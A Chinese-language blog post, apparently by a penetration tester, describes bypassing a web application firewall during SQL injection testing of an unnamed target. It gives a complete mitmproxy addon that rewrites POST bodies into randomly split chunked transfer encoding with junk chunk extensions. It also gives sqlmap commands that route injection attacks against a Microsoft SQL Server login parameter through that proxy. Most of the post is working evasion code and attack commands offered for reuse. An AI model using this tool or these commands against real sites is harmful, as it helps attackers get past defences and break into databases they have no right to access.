主要是在某xxx里面遇到了.直接测试发现被拦截,碰巧搜到了http协议分块传输绕过waf。还给出了yi g一个burp的插件地址chunked-coding-converter.但是我要是sqlmap跑的话,好像不是很方便!(其实这错了。好像可以全局给设置的.这个是后话)
想到了使用代理把数据给改变一下。还真让我搜到了有人做过类似的东西了sqlmap_chunked_proxy.只是我实际测试的适合好像发现一直报错
[+] chunked Succeeded
Traceback (most recent call last):
File "sqlmap_chunked_proxy.py", line 121, in <module>
aa = hack.httpraw(raw)
File "/usr/local/lib/python3.7/site-packages/HackRequests/HackRequests.py", line 220, in httpraw
conn.putheader(k, v)
File "/usr/local/Cellar/python/3.7.3/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 1197, in putheader
raise ValueError('Invalid header name %r' % (header,))
ValueError: Invalid header name b''
改了半天也不知道啥问题,还发现实际测试的时候发现cookie丢失了,好多问题索性修改一个吧。
修改抓包截包改报还得首推mitmproxy.直接写一个插件就可以修改了,这类借鉴了sqlmap_chunked_proxy的编码方式。很容易就实现了一个
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
mitmdump -k -s chunked_proxy.py -p 9999
'''
import mitmproxy.http
from mitmproxy import ctx
import random,string
def Confuse():
Confuse = ''.join(random.sample(string.ascii_letters + string.digits,random.randint(1,9)))
return Confuse
def payloadlistnum(s):
while True:
n = random.randint(1, len(s))
num = len(s) / n
if num < 9:
return n
def payloadlist(s, n):
fn = len(s) // n
rn = len(s) % n
sr = []
ix = 0
for i in range(n):
if i < rn:
sr.append(s[ix:ix + fn + 1])
ix += fn + 1
else:
sr.append(s[ix:ix + fn])
ix += fn
return (sr)
def payload2(s,n):
payload2 =''
for i in payloadlist(s, n):
if len(i) == 0:
pass
else:
payload2 = payload2 + str(len(i))+';'+Confuse()+'\n'+str(i)+'\n'
payload2 = payload2 + '0' + '\n' + '\n'
return (payload2)
def tamper(s):
n = payloadlistnum(s)
return (payload2(s,n))
class Counter:
def __init__(self):
pass
def request(self, flow: mitmproxy.http.HTTPFlow):
#add Transfer-Encoding: chunked
if flow.request.method == "POST":
try:
if flow.request.headers['Content-Length']:
flow.request.headers["Transfer-Encoding"] = "chunked"
content = tamper(flow.request.text)
except:
content = flow.request.text
# get request body
flow.request.text = content
ctx.log.info("Request Data: %s" % str(flow.request.text))
else:
flow.request.text = flow.request.text
def response(self,flow: mitmproxy.http.HTTPFlow):
flow.response.content = flow.response.content
ctx.log.info("Response Data: %s" % str(flow.response.text))
addons = [
Counter()
]
使用方法也是很简单的.首先启一个代理
mitmdump -k -s chunked_proxy.py -p 9999
然后调用sqlmap来跑,需要把流量过代理
python sqlmap.py -r ~/Downloads/123 --level 3 --risk 1 --random-agent --proxy=http://127.0.0.1:9999 -p UseerName --tech E -p UserName --dbms 'Microsoft SQL Server'
其实也可以利用burp开启全局chunked以后走burp的代理
python sqlmap.py -r ~/Downloads/123 --level 3 --risk 1 --random-agent --proxy=http://127.0.0.1:8080 -p UseerName --tech E -p UserName --dbms 'Microsoft SQL Server'